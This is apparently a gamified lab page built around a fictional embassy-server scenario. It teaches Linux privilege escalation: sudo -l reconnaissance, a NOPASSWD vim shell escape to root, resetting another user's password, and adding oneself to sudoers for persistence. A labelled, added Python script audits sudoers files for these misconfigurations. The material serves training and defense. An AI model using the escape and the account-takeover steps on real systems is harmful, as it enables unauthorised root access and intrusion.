Access Control
Escalate privileges. Become root. Control the system.
CLASSIFIED SCENARIO
You've infiltrated the embassy's network server but your access is limited. The ambassador's classified communications are in /root/diplomatic_cables/. Your mission: escalate privileges to root access, examine the sudoers configuration, and extract the classified data. Remember - with great power comes great audit trails.
Why Access Control Matters
Privilege escalation is the holy grail of system compromise. Understanding access control enables:
- Privilege escalation - Gain root from limited user access
- Persistence - Add yourself to sudoers for future access
- Lateral movement - Use elevated access to reach other systems
- Defense - Understand how attackers escalate to protect systems
- Audit - Identify misconfigured sudo rules
Privilege Escalation Vectors
- NOPASSWD sudo rules - Execute commands without password
- Misconfigured sudoers - Wildcards, dangerous commands
- SUID binaries - Programs that run as root
- Writable /etc/passwd - Add root-level user
- Kernel exploits - Dirty COW, etc. (out of scope)
Core Access Commands
sudo
Execute commands as root (or another user). The gateway to privilege.
su
Switch user. Become root or another user entirely.
visudo
Safely edit /etc/sudoers. Syntax checking prevents lockouts.
passwd
Change passwords. As root, change any user's password.
Command Deep Dive
sudo -l - Check Your Powers
$ sudo -l
Matching Defaults entries for operator on embassy-srv:
env_reset, mail_badpass
User operator may run the following commands on embassy-srv:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/less
[PRIVESC] NOPASSWD vim = shell escape to root!
[VECTOR] vim -> :!/bin/bash -> root shell
su - Switch User
$ su -
Password:
root@embassy-srv:~# whoami
root
[ESCALATED] Now running as root
[CAUTION] All commands logged to auth.log
Sudoers File Structure
# cat /etc/sudoers
# User privilege specification
root ALL=(ALL:ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# Operator can run specific commands without password
operator ALL=(root) NOPASSWD: /usr/bin/vim, /usr/bin/less
[DANGEROUS] vim and less allow shell escapes!
[EXPLOIT] sudo vim -> :!bash -> root
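For the audit and defense goals listed earlier, the following added example (not part of the original page) scans sudoers text for the patterns this page flags: NOPASSWD, wildcards, and the shell-escape binaries vim and less. It assumes aliases and included files are already expanded; the name audit_sudoers and the auditor rule in the sample are hypothetical.

```python
import os
import re

# Binaries the page names as shell-escape capable; extend the set for your hosts.
SHELL_ESCAPE = {"vim", "less"}

RULE = re.compile(r"^(%?[\w.-]+)\s+\S+?\s*=\s*(.+)$")              # who host = specs
SPEC = re.compile(r"^(?:\(([^)]*)\)\s*)?((?:[A-Z_]+:\s*)*)(.*)$")  # (runas) TAG: cmd

# First three rules are the page's sudoers file; the auditor line is constructed.
SAMPLE = """\
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
# Operator can run specific commands without password
operator ALL=(root) NOPASSWD: /usr/bin/vim, /usr/bin/less
auditor ALL=(root) NOEXEC: /usr/bin/less /var/log/*
"""

def audit_sudoers(text):
    """Return (who, command, reasons) for every risky command in sudoers text."""
    findings = []
    for line in text.replace("\\\n", " ").splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")) or "_Alias" in line:
            continue  # comments, Defaults and aliases are not expanded here
        m = RULE.match(line)
        if not m:
            continue
        who, specs = m.groups()
        nopasswd = noexec = False  # tags stay in force for later commands
        for spec in re.split(r",(?![^(]*\))", specs):  # keep commas inside (runas)
            _runas, tags, cmd = SPEC.match(spec.strip()).groups()
            for tag in re.findall(r"[A-Z_]+", tags):
                if tag in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag == "NOPASSWD"
                elif tag in ("NOEXEC", "EXEC"):
                    noexec = tag == "NOEXEC"
            reasons = ["NOPASSWD"] if nopasswd else []
            argv = cmd.split()
            if argv and os.path.basename(argv[0]) in SHELL_ESCAPE and not noexec:
                reasons.append("shell escape")
            if "*" in cmd:
                reasons.append("wildcard")
            if reasons:
                findings.append((who, cmd, reasons))
    return findings

if __name__ == "__main__":
    for who, cmd, reasons in audit_sudoers(SAMPLE):
        print(f"{who}: {cmd} -> {', '.join(reasons)}")
```

Rules flagged for vim are usually better expressed with sudoedit, and the NOEXEC tag limits escapes from pagers such as less.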
passwd - Control Access
root@embassy-srv:# passwd ambassador
New password:
Retype new password:
passwd: password updated successfully
[CHANGED] Ambassador's password reset
[ACCESS] Can now login as ambassador
Quick Reference
| Command | Purpose | Notes |
|---|---|---|
| sudo -l | List your sudo privileges | First recon step |
| sudo command | Run as root | Usually requires a password |
| sudo -u user cmd | Run as specific user | Lateral movement |
| su - | Become root | Needs root password |
| su - user | Become specific user | Needs that user's password |
| visudo | Edit sudoers safely | Syntax validation |
Privilege Escalation via vim
# === CLASSIC VIM ESCAPE ===
$ sudo -l # Check: (root) NOPASSWD: vim
$ sudo vim # Open vim as root
:!bash # In vim: escape to shell
root@embassy-srv:# id # Confirm root access
uid=0(root) gid=0(root) groups=0(root)
[SUCCESS] Escalated to root via vim shell escape
Ready to Escalate?
Test your privilege escalation skills, then infiltrate the embassy.